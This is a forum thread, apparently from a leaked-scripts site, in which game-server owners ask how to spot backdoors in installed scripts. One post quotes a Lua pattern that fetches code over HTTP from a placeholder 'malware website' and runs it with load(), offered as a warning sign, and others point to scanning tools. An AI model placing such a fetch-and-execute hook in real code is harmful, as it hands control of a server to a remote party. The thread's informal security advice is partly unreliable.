[QUESTION] How to spot a potential backdoor?

songbirdmusic_19573 Started 18-07-2024 03:09 17 replies 2,852 views

songbirdmusic_19573

Messages 127

Reactions 1

Credits 55

Joined Mar 2024

#1 songbirdmusic_19573 18-07-2024 03:09

I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

Reactions are only available for posts

VeryNiceIndeed

Messages 140

Reactions 0

Credits 17,992

Joined Jan 2023

#1 VeryNiceIndeed 18-07-2024 13:09

songbirdmusic_19573,

wrote:

I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...

That line is perfectly fine for a database

coolcsgo

Messages 10

Reactions 0

Credits 353

Joined Dec 2023

#2 coolcsgo 18-07-2024 16:22

This is just setting the auto increment, and default charset for the DB you imported

songbirdmusic_19573

Messages 127

Reactions 1

Credits 55

Joined Mar 2024

#3 songbirdmusic_19573 19-07-2024 01:14

Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked

Hopatchke

Messages 52

Reactions 2

Credits 6,049

Joined Aug 2022

#4 Hopatchke 29-08-2024 11:47

PerformHttpRequest(' Sht that goes to a malware website., function (e, d)

local s = assert(load(d))

if (d == nil) then return end

s()

end)

things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)

songbirdmusic_19573

Messages 127

Reactions 1

Credits 55

Joined Mar 2024

#5 songbirdmusic_19573 29-08-2024 12:46

Hopatchke,

wrote:

PerformHttpRequest(' Sht that goes to a malware website., function (e, d)

local s = assert(load(d))

if (d == nil) then return end

s()

end)

thing...

Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha

Hopatchke

Messages 52

Reactions 2

Credits 6,049

Joined Aug 2022

#6 Hopatchke 29-08-2024 13:02

songbirdmusic_19573,

wrote:

Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on th...

malwarebytes , the free version offers a good scan ;) , works perfectly!

songbirdmusic_19573

Messages 127

Reactions 1

Credits 55

Joined Mar 2024

#7 songbirdmusic_19573 30-08-2024 13:51

Hopatchke,

wrote:

malwarebytes , the free version offers a good scan ;) , works perfectly!

I actually currently have three different protections installed, so hopefully I'm not as screwed then if I downloaded something I wasn't supposed to

airis13370

Messages 1

Reactions 0

Credits 3

Joined Sep 2024

#8 airis13370 01-09-2024 16:37

grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh

amirexit

Messages 193

Reactions 0

Credits 63

Joined Sep 2024

#9 amirexit 03-09-2024 15:49

songbirdmusic_19573,

wrote:

I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...

i need to know too thanks for creating this thread

Du22121

Messages 30

Reactions 0

Credits 15

Joined Dec 2022

#10 Du22121 09-09-2024 10:48

you never know if they add back doors when its too late

songbirdmusic_19573

Messages 127

Reactions 1

Credits 55

Joined Mar 2024

#11 songbirdmusic_19573 20-09-2024 02:58

Du22121,

wrote:

you never know if they add back doors when its too late

Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions an ways to be safe, you need to know what to look for

Malagah

Messages 13

Reactions 0

Credits 58

Joined Sep 2024

#12 Malagah 22-09-2024 18:59

songbirdmusic_19573,

wrote:

Ce n'est pas forcÃƒÂ©ment vrai, il existe des vÃƒÂ©rificateurs de scripts et vous pouvez les analyser pour plus de sÃƒÂ©curitÃƒÂ©. J'analyse...

It would be cool to create a topic to explain how to do it and which tool to use :);)

khaosen

Messages 156

Reactions 4

Credits 159

Joined Mar 2024

#13 khaosen 22-09-2024 22:46

songbirdmusic_19573,

wrote:

I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...

if you want to detect backdoors look for performhttp inside scripts

cochinofrito

Messages 2

Reactions 0

Credits 50

Joined Sep 2024

#14 cochinofrito 01-10-2024 16:52

Hello,

Here is a tool to achieve this.

https://github.com/exersalza/FivemCipherFinder

Thanks,

royal6823

Messages 2

Reactions 0

Credits 38

Joined Oct 2024

#15 royal6823 10-10-2024 10:03

It is just a SQL Statement

dtm.os

Messages 36

Reactions 0

Credits 56

Joined Jan 2025

#16 dtm.os 14-01-2025 20:06

cochinofrito,

wrote:

Hello,

Here is a tool to achieve this.

https://github.com/exersalza/FivemCipherFinder

Thanks,

Your are truly the goat for this

interstarix

Messages 10

Reactions 0

Credits 953

Joined Jan 2025

#17 interstarix 16-01-2025 09:06

use cochinofrito cipherfinder is great tho

Achievements

HighLeaks

[QUESTION] How to spot a potential backdoor?

Edit

Login

Register